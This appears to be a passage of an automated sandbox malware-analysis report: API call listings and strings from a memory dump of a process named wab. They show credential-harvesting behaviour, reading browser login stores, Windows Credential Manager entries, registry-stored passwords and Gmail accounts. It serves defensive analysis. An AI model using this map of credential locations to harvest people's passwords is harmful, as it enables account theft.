                                                                                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040F881
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                          • API String ID: 1428123949-3474136107
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                          • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EE,00451398), ref: 00401273
                                                                                                                                                                                          • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2998058495-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00408DE1: LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                                                            • Part of subcall function 00408DE1: sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 0040BA7E
                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BAB1
                                                                                                                                                                                          • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BAC7
                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BB27
                                                                                                                                                                                          • LoadIconA.USER32(00000066,00000000), ref: 0040BB96
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040BBEE
                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,0044551F), ref: 0040BC03
                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040BC29
                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(004518C0), ref: 0040BC42
                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,004518C0), ref: 0040BC52
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040BC59
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040BC67
                                                                                                                                                                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BCC3
                                                                                                                                                                                            • Part of subcall function 00404B82: strlen.MSVCRT ref: 00404B9F
                                                                                                                                                                                            • Part of subcall function 00404B82: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404BC3
                                                                                                                                                                                          • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BD0E
                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BD21
                                                                                                                                                                                          • memset.MSVCRT ref: 0040BD36
                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 0040BD5A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                          • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                          • String ID: %s mode not allowed: %s$BINARY$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                          • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$lD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004078B8: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040EAAB,?,?,?,?), ref: 004078D1
                                                                                                                                                                                            • Part of subcall function 004078B8: CloseHandle.KERNEL32(00000000,?,?,?), ref: 004078FD
                                                                                                                                                                                            • Part of subcall function 004045BD: ??3@YAXPAX@Z.MSVCRT ref: 004045C4
                                                                                                                                                                                            • Part of subcall function 00406DD3: _mbscpy.MSVCRT ref: 00406DD8
                                                                                                                                                                                            • Part of subcall function 00406DD3: strrchr.MSVCRT ref: 00406DE0
                                                                                                                                                                                            • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D80B
                                                                                                                                                                                            • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D81F
                                                                                                                                                                                            • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D833
                                                                                                                                                                                            • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D900
                                                                                                                                                                                            • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D960
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EAF0
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EAFE
                                                                                                                                                                                          • memset.MSVCRT ref: 0040EB3F
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EB4E
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EB5C
                                                                                                                                                                                          • memset.MSVCRT ref: 0040EB9D
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EBAC
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EBBA
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040EC68
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040EC83
                                                                                                                                                                                            • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                            • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_strcmpistrrchr
                                                                                                                                                                                          • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _strcmpi
                                                                                                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                          • API String ID: 1439213657-1959339147
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00443AF6
                                                                                                                                                                                            • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                                                                                                                                                                          • strlen.MSVCRT ref: 00443B12
                                                                                                                                                                                          • memset.MSVCRT ref: 00443B4C
                                                                                                                                                                                          • memset.MSVCRT ref: 00443B60
                                                                                                                                                                                          • memset.MSVCRT ref: 00443B74
                                                                                                                                                                                          • memset.MSVCRT ref: 00443B9A
                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443BD1
                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443C0D
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443C1F
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00443CF6
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443D27
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443D39
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                          • String ID: salu
                                                                                                                                                                                          • API String ID: 3691931180-4177317985
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(psapi.dll,?,0040F791), ref: 0040F9BF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040F9D8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040F9E9
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040F9FA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040FA0B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040FA1C
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0040FA3C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                          • API String ID: 2449869053-232097475
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                          • memset.MSVCRT ref: 00403EBB
                                                                                                                                                                                          • memset.MSVCRT ref: 00403ECF
                                                                                                                                                                                          • memset.MSVCRT ref: 00403EE3
                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403F04
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00403F20
                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403F57
                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403F88
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F82
                                                                                                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403EFE
                                                                                                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E93
                                                                                                                                                                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F32
                                                                                                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00403F1A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                          • API String ID: 113626815-1670831295
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sprintf.MSVCRT ref: 004092EC
                                                                                                                                                                                          • LoadMenuA.USER32(?,?), ref: 004092FA
                                                                                                                                                                                            • Part of subcall function 00409123: GetMenuItemCount.USER32(?), ref: 00409138
                                                                                                                                                                                            • Part of subcall function 00409123: memset.MSVCRT ref: 00409159
                                                                                                                                                                                            • Part of subcall function 00409123: GetMenuItemInfoA.USER32 ref: 00409194
                                                                                                                                                                                            • Part of subcall function 00409123: strchr.MSVCRT ref: 004091AB
                                                                                                                                                                                          • DestroyMenu.USER32(00000000), ref: 00409318
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040935C
                                                                                                                                                                                          • CreateDialogParamA.USER32(?,00000000,00000000,004092C6,00000000), ref: 00409371
                                                                                                                                                                                          • memset.MSVCRT ref: 0040938D
                                                                                                                                                                                          • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040939E
                                                                                                                                                                                          • EnumChildWindows.USER32(00000000,Function_00009213,00000000), ref: 004093C6
                                                                                                                                                                                          • DestroyWindow.USER32(00000000), ref: 004093CD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                          • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                          • API String ID: 3259144588-3822380221
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F798), ref: 0040F937
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040F950
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040F961
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040F972
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040F983
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040F994
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00404651: FreeLibrary.KERNEL32(?,004045DE,?,0040F07D,?,00000000), ref: 00404658
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                          • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                          • API String ID: 2449869053-4258758744
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F1BF
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F1EC
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F215
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F28E
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 0040F2A1
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2AC
                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                          • String ID: Creds$ps:password
                                                                                                                                                                                          • API String ID: 551151806-1872227768
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wcsstr.MSVCRT ref: 0040424C
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404293
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042A7
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004042B7
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004042CA
                                                                                                                                                                                          • strchr.MSVCRT ref: 004042D8
                                                                                                                                                                                          • strlen.MSVCRT ref: 004042EC
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040430D
                                                                                                                                                                                          • strchr.MSVCRT ref: 0040431E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                          • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                          • API String ID: 3866421160-4070641962
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004094BA
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004094CA
                                                                                                                                                                                            • Part of subcall function 0040907D: memset.MSVCRT ref: 004090A2
                                                                                                                                                                                            • Part of subcall function 0040907D: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,?,00001000,00451200), ref: 004090C6
                                                                                                                                                                                            • Part of subcall function 0040907D: WritePrivateProfileStringA.KERNEL32(00451308,?,?,00451200), ref: 004090DD
                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(?,00000004,Function_000092CB,00000000), ref: 00409500
                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(?,00000005,Function_000092CB,00000000), ref: 0040950A
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00409512
                                                                                                                                                                                          • memset.MSVCRT ref: 0040952E
                                                                                                                                                                                          • LoadStringA.USER32(?,00000000,?,00001000), ref: 00409542
                                                                                                                                                                                            • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                          • API String ID: 1035899707-3647959541
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
